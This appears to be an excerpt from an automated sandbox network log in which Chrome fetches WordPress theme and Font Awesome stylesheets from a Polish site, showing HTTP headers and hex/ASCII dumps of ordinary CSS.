                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:55 UTC278INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:55 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:54:59 GMT
                                                            ETag: "10f1-620a8e93a90a0"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 4337
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:55 UTC4337INData Raw: 2a 20 7b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 7d 0a 0a 2f 2a 20 4d 41 49 4e 20 43 4f 4e 54 41 49 4e 45 52 20 2a 2f 0a 2e 63 6f 6e 74 61 69 6e 65 72 2c 20 23 70 6f 73 74 2d 61 72 65 61 2e 73 74 61 6e 64 61 72 64 2d 6d 69 6e 69 6d 61 6c 2e 66 75 6c 6c 2d 77 69 64 74 68 2d 63 6f 6e 74 65 6e 74 20 61 72 74 69 63 6c 65 2e 70 6f 73 74 20 2e 69 6e 6e 65 72 2d 77 72 61 70 09 7b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 2c 20 23 70
                                                            Data Ascii: * { -webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box; }/* MAIN CONTAINER */.container, #post-area.standard-minimal.full-width-content article.post .inner-wrap{ margin: 0 auto; position: relative; }.container, #p


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.1649718178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:55 UTC619OUTGET /wp-content/themes/salient/css/font-awesome.min.css?ver=4.6.3 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:56 UTC279INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:55 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:00 GMT
                                                            ETag: "c561-620a8e9430c75"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 50529
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:56 UTC7913INData Raw: 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 46 6f 6e 74 41 77 65 73 6f 6d 65 27 3b 0a 09 73 72 63 3a 75 72 6c 28 27 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 76 3d 34 2e 32 27 29 3b 0a 09 73 72 63 3a 75 72 6c 28 27 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 23 69 65 66 69 78 26 76 3d 34 2e 32 27 29 20 66 6f 72 6d 61 74 28 27 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 27 29 2c 0a 09 09 75 72 6c 28 27 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 73 76 67 23 66 6f 6e 74 61 77 65 73 6f 6d 65 72 65 67 75 6c 61 72 3f 76 3d 34 2e 32 27 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 2c 0a 09 20
                                                            Data Ascii: @font-face{font-family:'FontAwesome';src:url('fonts/fontawesome-webfont.eot?v=4.2');src:url('fonts/fontawesome-webfont.eot?#iefix&v=4.2') format('embedded-opentype'),url('fonts/fontawesome-webfont.svg#fontawesomeregular?v=4.2') format('svg'),
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 31 36 22 3b 7d 0a 2e 69 63 6f 6e 2d 74 69 6d 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 31 37 22 3b 7d 0a 2e 69 63 6f 6e 2d 72 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 31 38 22 3b 7d 0a 2e 69 63 6f 6e 2d 64 6f 77 6e 6c 6f 61 64 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 31 39 22 3b 7d 0a 2e 69 63 6f 6e 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 31 61 22 3b 7d 0a 2e 69 63 6f 6e 2d 75 70 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 31 62 22 3b 7d 0a 2e 69 63 6f 6e 2d 69 6e 62 6f 78 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 31 63
                                                            Data Ascii: lt:before{content:"\f016";}.icon-time:before{content:"\f017";}.icon-road:before{content:"\f018";}.icon-download-alt:before{content:"\f019";}.icon-download:before{content:"\f01a";}.icon-upload:before{content:"\f01b";}.icon-inbox:before{content:"\f01c
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 6e 74 3a 22 5c 66 30 66 32 22 3b 7d 0a 2e 69 63 6f 6e 2d 62 65 6c 6c 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 66 33 22 3b 7d 0a 2e 69 63 6f 6e 2d 63 6f 66 66 65 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 66 34 22 3b 7d 0a 2e 69 63 6f 6e 2d 66 6f 6f 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 66 35 22 3b 7d 0a 2e 69 63 6f 6e 2d 66 69 6c 65 2d 74 65 78 74 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 66 36 22 3b 7d 0a 2e 69 63 6f 6e 2d 62 75 69 6c 64 69 6e 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 66 37 22 3b 7d 0a 2e 69 63 6f 6e 2d 68 6f 73 70 69 74 61 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 66 38 22 3b 7d 0a 2e 69 63
                                                            Data Ascii: nt:"\f0f2";}.icon-bell-alt:before{content:"\f0f3";}.icon-coffee:before{content:"\f0f4";}.icon-food:before{content:"\f0f5";}.icon-file-text-alt:before{content:"\f0f6";}.icon-building:before{content:"\f0f7";}.icon-hospital:before{content:"\f0f8";}.ic
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d 33 29 22 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 32 37 30 64 65 67 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 32 37 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 32 37 30 64 65 67 29 7d 2e 66 61 2d 66 6c 69 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 7b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 61 73 69 63 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d 30 2c 20 6d 69 72 72 6f 72 3d 31 29 22 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2d 31 2c 20 31 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c
                                                            Data Ascii: Image(rotation=3)";-webkit-transform:rotate(270deg);-ms-transform:rotate(270deg);transform:rotate(270deg)}.fa-flip-horizontal{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";-webkit-transform:scale(-1, 1);-ms-transform:scal
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 2d 70 69 6e 74 65 72 65 73 74 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 64 33 22 7d 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 64 34 22 7d 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 64 35 22 7d 2e 66 61 2d 6d 6f 6e 65 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 64 36 22 7d 2e 66 61 2d 63 61 72 65 74 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 64 37 22 7d 2e 66 61 2d 63 61 72 65 74 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 64 38 22 7d 2e 66 61 2d 63 61 72 65 74 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b
                                                            Data Ascii: -pinterest-square:before{content:"\f0d3"}.fa-google-plus-square:before{content:"\f0d4"}.fa-google-plus:before{content:"\f0d5"}.fa-money:before{content:"\f0d6"}.fa-caret-down:before{content:"\f0d7"}.fa-caret-up:before{content:"\f0d8"}.fa-caret-left:before{
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 61 35 22 7d 2e 66 61 2d 64 69 67 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 61 36 22 7d 2e 66 61 2d 70 69 65 64 2d 70 69 70 65 72 2d 70 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 61 37 22 7d 2e 66 61 2d 70 69 65 64 2d 70 69 70 65 72 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 61 38 22 7d 2e 66 61 2d 64 72 75 70 61 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 61 39 22 7d 2e 66 61 2d 6a 6f 6f 6d 6c 61 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 61 61 22 7d 2e 66 61 2d 6c 61 6e 67 75 61 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 61 62 22 7d 2e 66 61 2d 66 61 78 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65
                                                            Data Ascii: content:"\f1a5"}.fa-digg:before{content:"\f1a6"}.fa-pied-piper-pp:before{content:"\f1a7"}.fa-pied-piper-alt:before{content:"\f1a8"}.fa-drupal:before{content:"\f1a9"}.fa-joomla:before{content:"\f1aa"}.fa-language:before{content:"\f1ab"}.fa-fax:before{conte
                                                            2025-01-15 10:07:56 UTC2616INData Raw: 2e 66 61 2d 6d 61 70 2d 73 69 67 6e 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 37 37 22 7d 2e 66 61 2d 6d 61 70 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 37 38 22 7d 2e 66 61 2d 6d 61 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 37 39 22 7d 2e 66 61 2d 63 6f 6d 6d 65 6e 74 69 6e 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 37 61 22 7d 2e 66 61 2d 63 6f 6d 6d 65 6e 74 69 6e 67 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 37 62 22 7d 2e 66 61 2d 68 6f 75 7a 7a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 37 63 22 7d 2e 66 61 2d 76 69 6d 65 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 37 64 22 7d 2e 66 61 2d 62 6c 61 63 6b 2d
                                                            Data Ascii: .fa-map-signs:before{content:"\f277"}.fa-map-o:before{content:"\f278"}.fa-map:before{content:"\f279"}.fa-commenting:before{content:"\f27a"}.fa-commenting-o:before{content:"\f27b"}.fa-houzz:before{content:"\f27c"}.fa-vimeo:before{content:"\f27d"}.fa-black-


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.1649717178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:55 UTC602OUTGET /wp-content/themes/salient/style.css?ver=7.6 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:56 UTC281INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:55 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:39:00 GMT
                                                            ETag: "99b52-620a8b010b677"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 629586
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:56 UTC7911INData Raw: 2f 2a 0a 09 54 68 65 6d 65 20 4e 61 6d 65 3a 20 53 61 6c 69 65 6e 74 0a 09 54 68 65 6d 65 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 6d 65 6e 65 63 74 61 72 2e 63 6f 6d 0a 09 41 75 74 68 6f 72 3a 20 54 68 65 6d 65 4e 65 63 74 61 72 0a 09 41 75 74 68 6f 72 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 74 68 65 6d 65 6e 65 63 74 61 72 2e 63 6f 6d 0a 09 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 41 6e 20 55 6c 74 72 61 20 52 65 73 70 6f 6e 73 69 76 65 20 4d 75 6c 74 69 2d 50 75 72 70 6f 73 65 20 54 68 65 6d 65 2e 0a 09 56 65 72 73 69 6f 6e 3a 20 37 2e 36 0a 09 4c 69 63 65 6e 73 65 3a 20 47 4e 55 20 47 65 6e 65 72 61 6c 20 50 75 62 6c 69 63 20 4c 69 63 65 6e 73 65 20 76 65 72 73 69 6f 6e 20 33 2e 30 0a 09 4c 69 63 65 6e 73 65 20 55 52 49 3a 20 68 74 74
                                                            Data Ascii: /*Theme Name: SalientTheme URI: http://www.themenectar.comAuthor: ThemeNectarAuthor URI: http://themenectar.comDescription: An Ultra Responsive Multi-Purpose Theme.Version: 7.6License: GNU General Public License version 3.0License URI: htt
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 69 6d 61 74 69 6f 6e 3a 20 6d 61 74 65 72 69 61 6c 2d 66 61 64 65 2d 69 6e 2d 73 65 63 6f 6e 64 20 31 2e 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 20 61 6c 74 65 72 6e 61 74 65 3b 0a 09 61 6e 69 6d 61 74 69 6f 6e 3a 20 6d 61 74 65 72 69 61 6c 2d 66 61 64 65 2d 69 6e 2d 73 65 63 6f 6e 64 20 31 2e 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 20 61 6c 74 65 72 6e 61 74 65 3b 0a 7d 0a 0a 2e 6c 6f 61 64 69 6e 67 2d 69 63 6f 6e 20 2e 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 2e 72 69 67 68 74 2d 73 69 64 65 2c 20 2e 6c 6f 61 64 69 6e 67 2d 69 63 6f 6e 20 2e 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 2e 6c 65 66 74 2d 73 69 64 65 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 70 6f 73
                                                            Data Ascii: imation: material-fade-in-second 1.2s linear infinite alternate;animation: material-fade-in-second 1.2s linear infinite alternate;}.loading-icon .material-icon .right-side, .loading-icon .material-icon .left-side { width: 50%; height: 100%; pos
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 6f 6a 65 63 74 2d 74 79 70 65 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 77 72 61 70 20 7b 0a 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 32 35 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 34 30 70 78 3b 0a 7d 0a 0a 62 6f 64 79 2e 73 69 6e 67 6c 65 2d 70 6f 72 74 66 6f 6c 69 6f 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 77 72 61 70 20 7b 0a 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 62 6f 64 79 2e 73 69 6e 67 6c 65 2d 70 6f 73 74 5b 64 61 74 61 2d 62 67 2d 68 65 61 64 65 72 3d 22 74 72 75 65 22 5d 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 77 72 61 70 20 7b 0a 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 34 30 70 78 21 69 6d 70
                                                            Data Ascii: oject-type .container-wrap {padding-top: 25px;margin-top: 0px!important;padding-bottom: 40px;}body.single-portfolio .container-wrap {padding-top: 0px!important;}body.single-post[data-bg-header="true"] .container-wrap {padding-top: 40px!imp
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 62 6f 74 74 6f 6d 3a 20 30 3b 0a 09 6c 65 66 74 3a 20 30 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 09 7a 2d 69 6e 64 65 78 3a 20 31 30 30 30 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 7d 0a 2e 62 6f 64 79 2d 62 6f 72 64 65 72 2d 74 6f 70 20 7b 0a 09 68 65 69 67 68 74 3a 20 32 30 70 78 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 74 6f 70 3a 20 30 3b 0a 09 6c 65 66 74 3a 20 30 3b 0a 09 7a 2d 69 6e 64 65 78 3a 20 31 30 30 30 30 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 7d 0a 2e 61 64 6d 69 6e 2d 62 61 72 20 2e 62 6f 64 79 2d 62 6f 72 64 65 72 2d 74 6f
                                                            Data Ascii: ;width: 100%;bottom: 0;left: 0;position: fixed;z-index: 10000;background-color: #fff;}.body-border-top {height: 20px;width: 100%;top: 0;left: 0;z-index: 10000;position: fixed;background-color: #fff;}.admin-bar .body-border-to
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 65 72 23 74 6f 70 20 23 6c 6f 67 6f 3a 68 6f 76 65 72 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 37 43 46 43 33 3b 0a 7d 0a 0a 68 65 61 64 65 72 23 74 6f 70 20 23 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 2f 2a 6d 61 78 2d 68 65 69 67 68 74 3a 20 33 30 70 78 3b 2a 2f 0a 09 74 65 78 74 2d 69 6e 64 65 6e 74 3a 20 2d 39 39 39 39 70 78 3b 0a 09 6d 61 78 2d 77 69 64 74 68 3a 20 6e 6f 6e 65 3b 0a 09 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 74 72 61 6e 73 69 74 69 6f 6e 3a 20 6f 70 61 63 69 74 79 20 30 2e 34 73 20 65 61 73 65 3b 0a 7d 0a 0a 68 65 61 64 65 72 23 74 6f 70 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 7a 2d 69 6e 64
                                                            Data Ascii: er#top #logo:hover {color: #27CFC3;}header#top #logo img {/*max-height: 30px;*/text-indent: -9999px;max-width: none;width: auto;margin-bottom: 0px;display: block;transition: opacity 0.4s ease;}header#top {position: relative;z-ind
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 63 6f 6c 6f 72 3a 20 23 39 39 39 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 35 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 39 29 3b 0a 20 20 20 09 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 35 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 39 29 3b 0a 09 7d 0a 09 68 74 6d 6c 20 62 6f 64 79 5b 64 61 74 61 2d 68 65 61 64 65 72 2d 66 6f 72 6d 61 74 3d 22 6c 65 66 74 2d 68 65 61 64 65 72 22 5d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 68 65 61 64 65 72 2d 6f 75 74 65 72 20 2e 63 61 72 74 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 20 2e 69 74 65 6d 2d 6e 61 6d 65 2c 0a 09 68 74 6d 6c 20 62 6f 64 79 5b 64 61 74 61 2d 68 65 61 64 65
                                                            Data Ascii: und-color: #fff;color: #999;box-shadow: 0 1px 5px rgba(0,0,0,0.09); -webkit-box-shadow: 0 1px 5px rgba(0,0,0,0.09);}html body[data-header-format="left-header"].woocommerce #header-outer .cart-notification .item-name,html body[data-heade
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 20 3e 20 6c 69 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 22 62 75 74 74 6f 6e 5f 22 5d 29 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 61 6e 63 65 73 74 6f 72 20 3e 20 61 20 7b 0a 09 09 63 6f 6c 6f 72 3a 20 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 0a 09 62 6f 64 79 5b 64 61 74 61 2d 68 65 61 64 65 72 2d 66 6f 72 6d 61 74 3d 22 6c 65 66 74 2d 68 65 61 64 65 72 22 5d 5b 64 61 74 61 2d 64 72 6f 70 64 6f 77 6e 2d 73 74 79 6c 65 3d 22 6d 69 6e 69 6d 61 6c 22 5d 20 2e 73 66 2d 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2c 0a 09 62 6f 64 79 5b 64 61 74 61 2d 68 65 61 64 65 72 2d 66 6f 72 6d 61 74 3d 22 6c 65 66 74 2d 68 65 61 64 65 72 22 5d 20 2e 73 66 2d 6d 65 6e 75 20 6c 69 20 3e 20 75 6c 2c 0a 09 62 6f 64 79 5b 64 61 74 61 2d 68 65 61 64 65 72 2d 66
                                                            Data Ascii: > li:not([class*="button_"]).current-menu-ancestor > a {color: #fff!important;}body[data-header-format="left-header"][data-dropdown-style="minimal"] .sf-menu > li > ul,body[data-header-format="left-header"] .sf-menu li > ul,body[data-header-f
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 6d 65 6e 75 2d 75 6e 64 65 72 2d 6c 6f 67 6f 22 5d 20 68 65 61 64 65 72 23 74 6f 70 20 6e 61 76 20 3e 20 75 6c 20 6c 69 2e 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2d 74 6f 67 67 6c 65 20 7b 0a 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 30 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 66 6f 72 6d 61 74 3d 22 63 65 6e 74 65 72 65 64 2d 6d 65 6e 75 2d 75 6e 64 65 72 2d 6c 6f 67 6f 22 5d 20 68 65 61 64 65 72 23 74 6f 70 20 2e 73 70 61 6e 5f 39 20 75 6c 20 6c 69 23 73 6f 63 69 61 6c 2d 69 6e 2d 6d 65 6e 75 20 61 20 7b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 21 69 6d 70 6f 72 74 61 6e 74
                                                            Data Ascii: menu-under-logo"] header#top nav > ul li.slide-out-widget-area-toggle {padding-top: 0!important;padding-bottom: 0!important;}#header-outer[data-format="centered-menu-under-logo"] header#top .span_9 ul li#social-in-menu a {margin-top: 0px!important
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 2c 20 0a 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 6c 68 65 3d 22 61 6e 69 6d 61 74 65 64 5f 75 6e 64 65 72 6c 69 6e 65 22 5d 20 68 65 61 64 65 72 23 74 6f 70 20 6e 61 76 20 2e 73 66 2d 6d 65 6e 75 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 61 6e 63 65 73 74 6f 72 20 3e 20 61 3a 61 66 74 65 72 2c 20 0a 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 6c 68 65 3d 22 61 6e 69 6d 61 74 65 64 5f 75 6e 64 65 72 6c 69 6e 65 22 5d 20 68 65 61 64 65 72 23 74 6f 70 20 6e 61 76 20 2e 73 66 2d 6d 65 6e 75 20 6c 69 2e 63 75 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 20 3e 20 61 3a 61 66 74 65 72 20 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 7d 0a 0a 23 68 65 61 64 65 72 2d 6f 75
                                                            Data Ascii: , #header-outer[data-lhe="animated_underline"] header#top nav .sf-menu li.current-menu-ancestor > a:after, #header-outer[data-lhe="animated_underline"] header#top nav .sf-menu li.current_page_item > a:after { width: 100%; left: 0;}#header-ou
